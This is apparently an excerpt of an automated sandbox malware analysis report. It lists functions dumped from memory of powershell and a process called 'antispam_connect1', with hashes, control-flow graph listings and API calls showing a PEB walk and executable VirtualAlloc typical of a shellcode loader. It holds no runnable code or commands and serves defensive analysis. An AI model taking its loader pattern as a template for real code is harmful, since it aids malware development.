                                              • Instruction Fuzzy Hash: DE211A35B001189FDB04DFA8D99499DFBF2FF88314B26C5A5E905AB361C731ED868B90
                                              Function 048F6DE8 Relevance: .3, Instructions: 278COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ede55ebd521e97603bc8a6e5dd2526c3641dee931b9098a7eb6291746af6029
                                              • Instruction ID: a24dcedbae34996af5f4ea0eb59ab074f0a876c56fbaa8be5cef33b9f20ccfc4
                                              • Opcode Fuzzy Hash: 0ede55ebd521e97603bc8a6e5dd2526c3641dee931b9098a7eb6291746af6029
                                              • Instruction Fuzzy Hash: 38B1A231A012489FCB15DF68D8409AEBBF2FF89314F1486A9E945EB362D735EC46CB50
                                              Function 048F2AA0 Relevance: .2, Instructions: 213COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ea702348c833d93d06d69cefb8498f0f6710207c021d86deb9e402c5647fe60
                                              • Instruction ID: 2db0200b1ccd9926c3394acd2cca59fb2aa33df6775615ffc16ffcd71283afd2
                                              • Opcode Fuzzy Hash: 6ea702348c833d93d06d69cefb8498f0f6710207c021d86deb9e402c5647fe60
                                              • Instruction Fuzzy Hash: 29918D74A006098FCB05CF58C8949AEFBB1FF49310B288A99D955EB3A5C736FC51CB90
                                              Function 0475D005 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178521366.000000000475D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0475D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_475d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efd59f4bf98e497c9600593ceb0b2aa2f8f69b89b6ef9ceef96476838f90f52c
                                              • Instruction ID: b622af3d7de6369be3fbc0d5ff32de931b44ae39f496729a5587a596f44a8863
                                              • Opcode Fuzzy Hash: efd59f4bf98e497c9600593ceb0b2aa2f8f69b89b6ef9ceef96476838f90f52c
                                              • Instruction Fuzzy Hash: 3E018C6200D3C09FE7228B259D94652BFA8DF43224F19C4DBEC888F2A7C2A85C45C772
                                              Function 048F7AA4 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4db4060f3602622b19d4be717ed58548f541784f8fc69f33c0458f7dd486da56
                                              • Instruction ID: 4ec864fc356fa77acdbe5816023a88d856e5a3ae1f5a1e6c70b5112bed60f9a6
                                              • Opcode Fuzzy Hash: 4db4060f3602622b19d4be717ed58548f541784f8fc69f33c0458f7dd486da56
                                              • Instruction Fuzzy Hash: 9411E539A005089FDB04DF99D5849DDFBF2FF88314F2586A5E904A7721C731ED858B50
                                              Function 0475D01D Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178521366.000000000475D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0475D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_475d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88af44fdd9921a307ea13bde8fd70af140e034d2d304e7fbe54763e7d5657b31
                                              • Instruction ID: 8fb52697752831fef09b7b622d967ef46bb7bc3bd9aaad7d4f9a9f9a4486118f
                                              • Opcode Fuzzy Hash: 88af44fdd9921a307ea13bde8fd70af140e034d2d304e7fbe54763e7d5657b31
                                              • Instruction Fuzzy Hash: FA01F2715043449AE7308E2AED84B66FF98DF41330F18C81AEC4C0E356D2B9A842C6B1

                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:7
                                              Total number of Limit Nodes:0
                                              execution_graph 866 30b4800 GetPEB 867 30b4859 866->867 868 30b49fd VirtualAlloc 867->868 871 30b48e0 867->871 872 30b52e1 868->872 870 30b4a57 VirtualAlloc 870->871 873 30b530a 872->873 873->870

                                              Callgraph

                                              Executed Functions

                                              Function 030B4800 Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 506memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 30b4800-30b4857 GetPEB 1 30b485b-30b4870 call 30b6eac 0->1 4 30b4859 1->4 5 30b4872-30b48b3 1->5 4->1 6 30b48e0 5->6 7 30b48b5-30b48cc call 30b6eac 5->7 9 30b48e2-30b48e8 6->9 11 30b48eb-30b48f0 7->11 12 30b48ce-30b48de 7->12 11->6 13 30b48f2-30b4a92 VirtualAlloc call 30b52e1 VirtualAlloc call 30b6f1c 11->13 12->6 12->7 25 30b4a97-30b4ab5 call 30b6eef 13->25 28 30b4b1c-30b4b3a call 30b6f1c 25->28 29 30b4ab7-30b4ac3 25->29 37 30b4bc1-30b4bc9 28->37 38 30b4b40-30b4b4b 28->38 30 30b4ac5-30b4ad6 29->30 32 30b4b0a 30->32 33 30b4ad8-30b4adc 30->33 36 30b4b0d-30b4b1a 32->36 33->32 35 30b4ade-30b4ae2 33->35 35->32 39 30b4ae4-30b4b08 call 30b6eef 35->39 36->28 36->30 41 30b4bcf-30b4be2 37->41 42 30b4c63-30b4c72 37->42 38->37 40 30b4b4d-30b4b57 38->40 39->36 54 30b4b59-30b4b65 40->54 55 30b4bb1-30b4bbc 40->55 41->42 43 30b4be4-30b4c02 41->43 45 30b4c78-30b4c98 42->45 46 30b4d06-30b4d16 42->46 48 30b4c5b-30b4c61 43->48 49 30b4c04-30b4c0a 43->49 59 30b4c9a-30b4cb4 call 30b6eef 45->59 60 30b4d00-30b4d03 45->60 51 30b4d18 46->51 52 30b4d34-30b4d3a 46->52 48->42 48->43 56 30b4c0d-30b4c27 49->56 57 30b4d1b-30b4d1e 51->57 58 30b4d3d-30b4d48 52->58 61 30b4b6e-30b4b70 54->61 62 30b4b67-30b4b6c 54->62 55->40 67 30b4bbe 55->67 63 30b4c29-30b4c2c 56->63 64 30b4c42-30b4c44 56->64 65 30b4d2e-30b4d32 57->65 66 30b4d20-30b4d29 57->66 68 30b4d4a-30b4d52 58->68 69 30b4d63-30b4d6b 58->69 96 30b4cbe-30b4cc7 59->96 97 30b4cb6-30b4cbb 59->97 60->46 74 30b4ba5 61->74 73 30b4ba8-30b4bac 62->73 75 30b4c2e-30b4c31 63->75 76 30b4c3d-30b4c40 63->76 77 30b4c47 64->77 65->52 65->57 78 30b4d2b 66->78 79 30b4da1-30b4dbb 66->79 67->37 80 30b4d55-30b4d58 68->80 71 30b4d89-30b4d9c 69->71 72 30b4d6d-30b4d71 69->72 71->9 72->71 83 30b4d73 72->83 87 30b4bae 73->87 88 30b4b72 73->88 74->73 84 30b4c38-30b4c3b 75->84 85 30b4c33-30b4c36 75->85 76->77 86 30b4c4a-30b4c50 77->86 78->65 79->58 80->69 81 30b4d5a-30b4d61 80->81 81->69 81->80 89 30b4d76-30b4d84 83->89 84->86 85->84 85->86 86->56 93 30b4c52-30b4c58 86->93 87->55 90 30b4b90-30b4b96 88->90 91 30b4b74-30b4b8e 88->91 100 30b4d86 89->100 95 30b4b9a-30b4ba2 90->95 91->95 93->48 95->74 103 30b4cc9 96->103 104 30b4cce-30b4ce3 96->104 97->96 100->71 103->104 104->60 106 30b4ce5-30b4cf0 104->106 107 30b4cf2-30b4cf4 106->107 108 30b4cf6 106->108 109 30b4cf9 107->109 108->109 109->60
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 030B4A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 030B4A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.3372407592.00000000030B4000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_30b4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: b69d2e6011ff902392b2c7d0f4f7870a6ab07b3633a57c414d4606a239f22e6e
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: 212235B1A012199FDB14CF99C884BEEBBB5FF48314F298169E915AB341D770EA40CF94

                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:7
                                              Total number of Limit Nodes:0
                                              execution_graph 866 2d84800 GetPEB 867 2d84859 866->867 868 2d849fd VirtualAlloc 867->868 871 2d848e0 867->871 872 2d852e1 868->872 870 2d84a57 VirtualAlloc 870->871 873 2d8530a 872->873 873->870

                                              Callgraph

                                              Executed Functions

                                              Function 02D84800 Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 506memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 2d84800-2d84857 GetPEB 1 2d8485b-2d84870 call 2d86eac 0->1 4 2d84859 1->4 5 2d84872-2d848b3 1->5 4->1 6 2d848e0 5->6 7 2d848b5-2d848cc call 2d86eac 5->7 9 2d848e2-2d848e8 6->9 11 2d848eb-2d848f0 7->11 12 2d848ce-2d848de 7->12 11->6 13 2d848f2-2d84a92 VirtualAlloc call 2d852e1 VirtualAlloc call 2d86f1c 11->13 12->6 12->7 25 2d84a97-2d84ab5 call 2d86eef 13->25 28 2d84b1c-2d84b3a call 2d86f1c 25->28 29 2d84ab7-2d84ac3 25->29 37 2d84b40-2d84b4b 28->37 38 2d84bc1-2d84bc9 28->38 30 2d84ac5-2d84ad6 29->30 32 2d84ad8-2d84adc 30->32 33 2d84b0a 30->33 32->33 35 2d84ade-2d84ae2 32->35 36 2d84b0d-2d84b1a 33->36 35->33 41 2d84ae4-2d84b08 call 2d86eef 35->41 36->28 36->30 37->38 42 2d84b4d-2d84b57 37->42 39 2d84bcf-2d84be2 38->39 40 2d84c63-2d84c72 38->40 39->40 43 2d84be4-2d84c02 39->43 45 2d84c78-2d84c98 40->45 46 2d84d06-2d84d16 40->46 41->36 54 2d84b59-2d84b65 42->54 55 2d84bb1-2d84bbc 42->55 48 2d84c5b-2d84c61 43->48 49 2d84c04-2d84c0a 43->49 59 2d84c9a-2d84cb4 call 2d86eef 45->59 60 2d84d00-2d84d03 45->60 51 2d84d18 46->51 52 2d84d34-2d84d3a 46->52 48->40 48->43 56 2d84c0d-2d84c27 49->56 57 2d84d1b-2d84d1e 51->57 58 2d84d3d-2d84d48 52->58 61 2d84b6e-2d84b70 54->61 62 2d84b67-2d84b6c 54->62 55->42 67 2d84bbe 55->67 63 2d84c29-2d84c2c 56->63 64 2d84c42-2d84c44 56->64 65 2d84d2e-2d84d32 57->65 66 2d84d20-2d84d29 57->66 68 2d84d4a-2d84d52 58->68 69 2d84d63-2d84d6b 58->69 96 2d84cbe-2d84cc7 59->96 97 2d84cb6-2d84cbb 59->97 60->46 75 2d84ba5 61->75 74 2d84ba8-2d84bac 62->74 76 2d84c3d-2d84c40 63->76 77 2d84c2e-2d84c31 63->77 78 2d84c47 64->78 65->52 65->57 79 2d84d2b 66->79 80 2d84da1-2d84dbb 66->80 67->38 70 2d84d55-2d84d58 68->70 72 2d84d89-2d84d9c 69->72 73 2d84d6d-2d84d71 69->73 70->69 81 2d84d5a-2d84d61 70->81 72->9 73->72 83 2d84d73 73->83 87 2d84bae 74->87 88 2d84b72 74->88 75->74 76->78 84 2d84c38-2d84c3b 77->84 85 2d84c33-2d84c36 77->85 86 2d84c4a-2d84c50 78->86 79->65 80->58 81->69 81->70 89 2d84d76-2d84d84 83->89 84->86 85->84 85->86 86->56 93 2d84c52-2d84c58 86->93 87->55 90 2d84b90-2d84b96 88->90 91 2d84b74-2d84b8e 88->91 100 2d84d86 89->100 95 2d84b9a-2d84ba2 90->95 91->95 93->48 95->75 103 2d84cc9 96->103 104 2d84cce-2d84ce3 96->104 97->96 100->72 103->104 104->60 106 2d84ce5-2d84cf0 104->106 107 2d84cf2-2d84cf4 106->107 108 2d84cf6 106->108 109 2d84cf9 107->109 108->109 109->60
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 02D84A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 02D84A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3372498357.0000000002D84000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D84000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_2d84000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: 4d8517fb4992cc3b353b2797a49fcb997e6d95b71363b57b3ca2b70d68710978
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: 412249B1E0021A9FDB14DF99C884BAEBBB5FF48314F258169E915AB344E770E940CF94